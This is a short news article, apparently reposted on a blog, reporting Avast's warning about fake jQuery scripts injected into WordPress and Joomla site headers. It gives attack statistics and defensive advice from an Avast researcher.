Cybersecurity provider Avast is warning WordPress and Joomla users about the recent popularity of attacks injecting fake jQuery script into the head section of websites. jQuery is popular among developers as a library of tools to implement JavaScript code across different browsers, and Avast said it is becoming popular for other, less benign uses.
Cybercriminals can inject the fake script by changing a single "var base =" line to point to a hacked website, which is the source of the malicious "/js/jquery.min.php" script, according to a blog post on Avast's website. The company says the number of hacked domains is "abnormally high," resulting in 4.5 million user attacks registered by Avast in daily attacks since November. Almost 70 million unique files have been found with malicious code on hacked websites.
A normal visitor who is not looking into the source code will not notice any difference in the website, because the script is located before the tag </head>.
Read more: Is Managed WordPress Hosting Right For You?
Avast recommends the standard security measures, urges WordPress and Joomla users not to delete their system files, and reminds that updating to newer versions tends to provide better security. It also refers website operators to their web hosts.
"You may think, why me? But there could be more websites with the same problem, especially if you use shared hosting. It is worth asking your hosting provider for some advice. It is very common that hosting providers run some community forum along with their services. These forums are the best way to share your problem and experiences. Also this can be the fastest way to deal with a problem, because more people can be involved," said Avast researcher Alexej Savčin in the blog post. "Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service."
Read more: Agencies Plan to Spend More Time and Money on WordPress Projects in 2016
Zero Day also points out a parallel with the KimcilWare ransomware, which was developed from an educational tool, and recently began to be used against sites running Magento.
jQuery plugin FancyBox was used to attack WordPress sites last year.
Source: WordPress, Joomla Attacks That Inject Fake jQuery Undetectable by Website Visitors
No comments:
Post a Comment